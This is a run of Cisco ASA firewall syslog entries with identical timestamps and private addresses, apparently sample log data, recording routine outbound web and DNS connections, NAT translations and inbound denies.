%ASA-6-302014: Teardown TCP connection 11564 for outside:192.168.115.46/80 to inside:172.31.156.80/1382 duration 0:05:25 bytes 575 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11797 for outside:192.168.19.254/80 to inside:172.31.156.80/1385 duration 0:00:00 bytes 5391 TCP Reset-I +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.156.80/1386 to outside:192.168.98.44/8278 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11798 for outside:192.168.115.46/80 (192.168.115.46/80) to inside:172.31.156.80/1386 (172.31.156.80/1386) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1275 to outside:192.168.98.44/8279 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11799 for outside:192.168.205.99/80 (192.168.205.99/80) to inside:172.31.98.44/1275 (172.31.98.44/1275) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:192.168.98.44/1190 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11800 for outside:192.168.14.30/53 (192.168.14.30/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11800 for outside:192.168.14.30/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 373 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11801 for outside:192.168.252.210/53 (192.168.252.210/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11801 for outside:192.168.252.210/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 207 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1276 to outside:192.168.98.44/8280 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11802 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1276 (172.31.98.44/1276) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1277 to outside:192.168.98.44/8281 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11803 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1277 (172.31.98.44/1277) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11802 for outside:192.168.98.165/80 to inside:172.31.98.44/1276 duration 0:00:00 bytes 12853 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1278 to outside:192.168.98.44/8282 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11804 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1278 (172.31.98.44/1278) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11803 for outside:192.168.98.165/80 to inside:172.31.98.44/1277 duration 0:00:00 bytes 5291 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1279 to outside:192.168.98.44/8283 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11805 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1279 (172.31.98.44/1279) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11804 for outside:192.168.98.165/80 to inside:172.31.98.44/1278 duration 0:00:00 bytes 965 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11805 for outside:192.168.98.165/80 to inside:172.31.98.44/1279 duration 0:00:00 bytes 8605 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1280 to outside:192.168.98.44/8284 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11806 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1280 (172.31.98.44/1280) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11806 for outside:192.168.98.165/80 to inside:172.31.98.44/1280 duration 0:00:00 bytes 3428 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1281 to outside:192.168.98.44/8285 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11807 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1281 (172.31.98.44/1281) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1282 to outside:192.168.98.44/8286 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11808 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1282 (172.31.98.44/1282) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1283 to outside:192.168.98.44/8287 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11809 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1283 (172.31.98.44/1283) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1284 to outside:192.168.98.44/8288 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11810 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1284 (172.31.98.44/1284) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11807 for outside:192.168.98.165/80 to inside:172.31.98.44/1281 duration 0:00:00 bytes 2028 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11808 for outside:192.168.98.165/80 to inside:172.31.98.44/1282 duration 0:00:00 bytes 1085 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11809 for outside:192.168.98.165/80 to inside:172.31.98.44/1283 duration 0:00:00 bytes 868 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1285 to outside:192.168.98.44/8289 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11811 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1285 (172.31.98.44/1285) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1286 to outside:192.168.98.44/8290 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11812 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1286 (172.31.98.44/1286) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11810 for outside:192.168.98.165/80 to inside:172.31.98.44/1284 duration 0:00:00 bytes 4439 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1287 to outside:192.168.98.44/8291 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11813 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1287 (172.31.98.44/1287) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11811 for outside:192.168.98.165/80 to inside:172.31.98.44/1285 duration 0:00:00 bytes 914 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11812 for outside:192.168.98.165/80 to inside:172.31.98.44/1286 duration 0:00:00 bytes 871 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11814 for outside:192.168.100.107/53 (192.168.100.107/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1288 to outside:192.168.98.44/8292 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11815 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1288 (172.31.98.44/1288) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11814 for outside:192.168.100.107/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 384 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11816 for outside:192.168.104.8/53 (192.168.104.8/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11816 for outside:192.168.104.8/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 94 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1289 to outside:192.168.98.44/8293 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11817 for outside:192.168.123.191/80 (192.168.123.191/80) to inside:172.31.98.44/1289 (172.31.98.44/1289) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11815 for outside:192.168.98.165/80 to inside:172.31.98.44/1288 duration 0:00:00 bytes 945 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11813 for outside:192.168.98.165/80 to inside:172.31.98.44/1287 duration 0:00:00 bytes 13284 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11818 for outside:192.168.100.4/53 (192.168.100.4/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11818 for outside:192.168.100.4/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1290 to outside:192.168.98.44/8294 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11819 for outside:192.168.198.25/80 (192.168.198.25/80) to inside:172.31.98.44/1290 (172.31.98.44/1290) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 9828 for outside:192.168.48.1/67 to NP Identity Ifc:255.255.255.255/68 duration 0:58:46 bytes 58512 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1272 to outside:192.168.98.44/8276 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11820 for outside:192.168.3.39/53 (192.168.3.39/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11821 for outside:192.168.162.30/53 (192.168.162.30/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11820 for outside:192.168.3.39/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 168 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11822 for outside:192.168.3.39/53 (192.168.3.39/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11821 for outside:192.168.162.30/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 198 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11822 for outside:192.168.3.39/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 150 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11823 for outside:192.168.48.186/53 (192.168.48.186/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11823 for outside:192.168.48.186/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 84 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1291 to outside:192.168.98.44/8295 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11824 for outside:192.168.54.190/80 (192.168.54.190/80) to inside:172.31.98.44/1291 (172.31.98.44/1291) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11825 for outside:192.168.254.94/53 (192.168.254.94/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11825 for outside:192.168.254.94/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 188 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1292 to outside:192.168.98.44/8296 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11826 for outside:192.168.54.190/80 (192.168.54.190/80) to inside:172.31.98.44/1292 (172.31.98.44/1292) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1293 to outside:192.168.98.44/8297 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11827 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1293 (172.31.98.44/1293) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1294 to outside:192.168.98.44/8298 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11828 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1294 (172.31.98.44/1294) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11827 for outside:192.168.98.165/80 to inside:172.31.98.44/1293 duration 0:00:00 bytes 5964 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1295 to outside:192.168.98.44/8299 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11829 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1295 (172.31.98.44/1295) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1296 to outside:192.168.98.44/8300 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11830 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1296 (172.31.98.44/1296) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11828 for outside:192.168.98.165/80 to inside:172.31.98.44/1294 duration 0:00:00 bytes 6694 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11829 for outside:192.168.98.165/80 to inside:172.31.98.44/1295 duration 0:00:00 bytes 1493 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11830 for outside:192.168.98.165/80 to inside:172.31.98.44/1296 duration 0:00:00 bytes 893 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1297 to outside:192.168.98.44/8301 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11831 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1297 (172.31.98.44/1297) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1298 to outside:192.168.98.44/8302 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11832 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1298 (172.31.98.44/1298) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11833 for outside:192.168.179.9/53 (192.168.179.9/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11833 for outside:192.168.179.9/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 150 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11831 for outside:192.168.98.165/80 to inside:172.31.98.44/1297 duration 0:00:00 bytes 2750 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1299 to outside:192.168.98.44/8303 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11834 for outside:192.168.247.99/80 (192.168.247.99/80) to inside:172.31.98.44/1299 (172.31.98.44/1299) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1300 to outside:192.168.98.44/8304 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11835 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1300 (172.31.98.44/1300) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11832 for outside:192.168.98.165/80 to inside:172.31.98.44/1298 duration 0:00:00 bytes 881 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11835 for outside:192.168.98.165/80 to inside:172.31.98.44/1300 duration 0:00:00 bytes 2202 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1301 to outside:192.168.98.44/8305 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11836 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1301 (172.31.98.44/1301) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1302 to outside:192.168.98.44/8306 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11837 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1302 (172.31.98.44/1302) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1276 to outside:192.168.98.44/8280 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1277 to outside:192.168.98.44/8281 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1278 to outside:192.168.98.44/8282 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1279 to outside:192.168.98.44/8283 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1280 to outside:192.168.98.44/8284 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1281 to outside:192.168.98.44/8285 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1282 to outside:192.168.98.44/8286 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1283 to outside:192.168.98.44/8287 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1284 to outside:192.168.98.44/8288 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1285 to outside:192.168.98.44/8289 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1286 to outside:192.168.98.44/8290 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1287 to outside:192.168.98.44/8291 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1288 to outside:192.168.98.44/8292 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1293 to outside:192.168.98.44/8297 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1294 to outside:192.168.98.44/8298 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1304 to outside:192.168.98.44/8308 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11840 for outside:192.168.205.99/80 (192.168.205.99/80) to inside:172.31.98.44/1304 (172.31.98.44/1304) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1295 to outside:192.168.98.44/8299 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1296 to outside:192.168.98.44/8300 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11841 for outside:192.168.0.124/53 (192.168.0.124/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11842 for outside:192.168.160.2/53 (192.168.160.2/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11841 for outside:192.168.0.124/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 318 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11842 for outside:192.168.160.2/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1305 to outside:192.168.98.44/8309 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11843 for outside:192.168.124.24/80 (192.168.124.24/80) to inside:172.31.98.44/1305 (172.31.98.44/1305) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1297 to outside:192.168.98.44/8301 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1298 to outside:192.168.98.44/8302 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1299 to outside:192.168.98.44/8303 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1300 to outside:192.168.98.44/8304 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1301 to outside:192.168.98.44/8305 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1302 to outside:192.168.98.44/8306 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1303 to outside:192.168.98.44/8307 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11843 for outside:192.168.124.24/80 to inside:172.31.98.44/1305 duration 0:00:04 bytes 410333 TCP Reset-I +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1306 to outside:192.168.98.44/8310 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11844 for outside:192.168.124.24/80 (192.168.124.24/80) to inside:172.31.98.44/1306 (172.31.98.44/1306) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 